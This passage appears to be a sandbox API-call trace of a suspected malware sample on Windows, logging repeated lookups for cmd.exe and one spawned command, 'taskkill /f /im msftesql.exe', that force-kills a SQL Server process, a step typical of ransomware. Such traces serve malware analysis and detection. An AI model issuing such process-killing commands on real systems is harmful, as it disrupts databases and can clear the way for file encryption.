GetProcAddress (hModule=0x75600000, lpProcName="GetEnvironmentVariableW") returned 0x75619970 [0123.774] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123ba000, nSize=0x64 | out: lpBuffer="") returned 0x35 [0123.774] GetProcAddress (hModule=0x75600000, lpProcName="GetFileAttributesExW") returned 0x75626a40 [0123.774] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b0058 | out: lpFileInformation=0x123b0058*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0123.775] GetProcAddress (hModule=0x75600000, lpProcName="CreateFileW") returned 0x75626890 [0123.777] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0123.777] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x123b00a8 | out: lpFileInformation=0x123b00a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0123.777] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0123.777] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b00f8 | out: lpFileInformation=0x123b00f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0123.777] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0123.777] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x123b0148 | out: lpFileInformation=0x123b0148*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0123.777] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0123.778] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x123b0198 | out: lpFileInformation=0x123b0198*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0123.778] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0123.778] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x123b01e8 | out: lpFileInformation=0x123b01e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0123.778] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0123.778] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x123b0238 | out: lpFileInformation=0x123b0238*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0123.778] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0123.778] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x123b0288 | out: lpFileInformation=0x123b0288*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0123.778] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0123.779] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x123b02d8 | out: lpFileInformation=0x123b02d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0123.779] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0123.779] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x123b0328 | out: lpFileInformation=0x123b0328*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0123.779] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0123.779] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x123b0378 | out: lpFileInformation=0x123b0378*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0123.779] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0123.779] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x123b03c8 | out: lpFileInformation=0x123b03c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0123.780] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0123.780] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123ba0d0, nSize=0x64 | out: lpBuffer="") returned 0x63 [0123.780] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b0418 | out: lpFileInformation=0x123b0418*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0123.799] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123ba1a0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0123.799] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b0468 | out: lpFileInformation=0x123b0468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0123.799] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0123.800] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0123.800] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0123.800] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0123.800] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0123.800] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0123.800] GetProcAddress (hModule=0x75600000, lpProcName="GetEnvironmentStringsW") returned 0x7561aac0 [0123.800] GetEnvironmentStringsW () returned 0x8ea900* [0123.802] GetProcAddress (hModule=0x75600000, lpProcName="FreeEnvironmentStringsW") returned 0x7561a7e0 [0123.802] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0123.802] GetProcAddress (hModule=0x75600000, lpProcName="GetCurrentProcess") returned 0x756138c0 [0123.802] GetCurrentProcess () returned 0xffffffff [0123.803] GetProcAddress (hModule=0x75600000, lpProcName="DuplicateHandle") returned 0x75626640 [0123.803] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12392520, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12392520*=0x13c) returned 1 [0123.803] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12392524, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12392524*=0x140) returned 1 [0123.803] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12392528, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12392528*=0x144) returned 1 [0123.803] GetProcAddress (hModule=0x75600000, lpProcName="CreateProcessW") returned 0x7561b000 [0123.804] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im msftesql.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x123e2000, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x13c, hStdOutput=0x140, hStdError=0x144), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im msftesql.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x158, hThread=0x154, dwProcessId=0xeac, dwThreadId=0x12c8)) returned 1 [0125.241] SetEvent (hEvent=0x150) returned 1 [0125.241] GetProcAddress (hModule=0x75600000, lpProcName="CloseHandle") returned 0x75626630 [0125.241] CloseHandle (hObject=0x154) returned 1 [0125.241] CloseHandle (hObject=0x144) returned 1 [0125.241] CloseHandle (hObject=0x140) returned 1 [0125.241] CloseHandle (hObject=0x13c) returned 1 [0125.242] CloseHandle (hObject=0x130) returned 1 [0125.242] CloseHandle (hObject=0x134) returned 1 [0125.242] CloseHandle (hObject=0x138) returned 1 [0125.242] GetProcAddress (hModule=0x75600000, lpProcName="WaitForSingleObject") returned 0x75626820 [0125.242] WaitForSingleObject (hHandle=0x158, dwMilliseconds=0xffffffff) returned 0x0 [0141.633] SetEvent (hEvent=0x150) returned 1 [0141.634] GetProcAddress (hModule=0x75600000, lpProcName="GetExitCodeProcess") returned 0x7561fdb0 [0141.635] GetExitCodeProcess (in: hProcess=0x158, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0141.636] GetProcAddress (hModule=0x75600000, lpProcName="GetProcessTimes") returned 0x75623dc0 [0141.637] GetProcessTimes (in: hProcess=0x158, lpCreationTime=0x1234c240, lpExitTime=0x1234c248, lpKernelTime=0x1234c250, lpUserTime=0x1234c258 | out: lpCreationTime=0x1234c240, lpExitTime=0x1234c248, lpKernelTime=0x1234c250, lpUserTime=0x1234c258) returned 1 [0141.637] CloseHandle (hObject=0x158) returned 1 [0141.639] SetEvent (hEvent=0x128) returned 1 [0141.639] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x4) returned 0x102 [0141.648] SetEvent (hEvent=0x128) returned 1 [0141.648] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123ba270, nSize=0x64 | out: lpBuffer="") returned 0x35 [0141.649] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b04b8 | out: lpFileInformation=0x123b04b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0141.649] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0141.649] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x123b0508 | out: lpFileInformation=0x123b0508*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0141.649] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0141.650] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b0558 | out: lpFileInformation=0x123b0558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0141.650] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0141.650] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x123b05a8 | out: lpFileInformation=0x123b05a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0141.650] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0141.650] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x123b05f8 | out: lpFileInformation=0x123b05f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0141.650] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0141.650] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x123b0648 | out: lpFileInformation=0x123b0648*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0141.650] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0141.650] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x123b0698 | out: lpFileInformation=0x123b0698*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0141.651] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0141.651] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x123b06e8 | out: lpFileInformation=0x123b06e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0141.651] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0141.651] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x123b0738 | out: lpFileInformation=0x123b0738*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0141.651] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0141.651] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x123b0788 | out: lpFileInformation=0x123b0788*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0141.651] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0141.651] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x123b07d8 | out: lpFileInformation=0x123b07d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0141.652] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0141.652] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x123b0828 | out: lpFileInformation=0x123b0828*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0141.652] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, 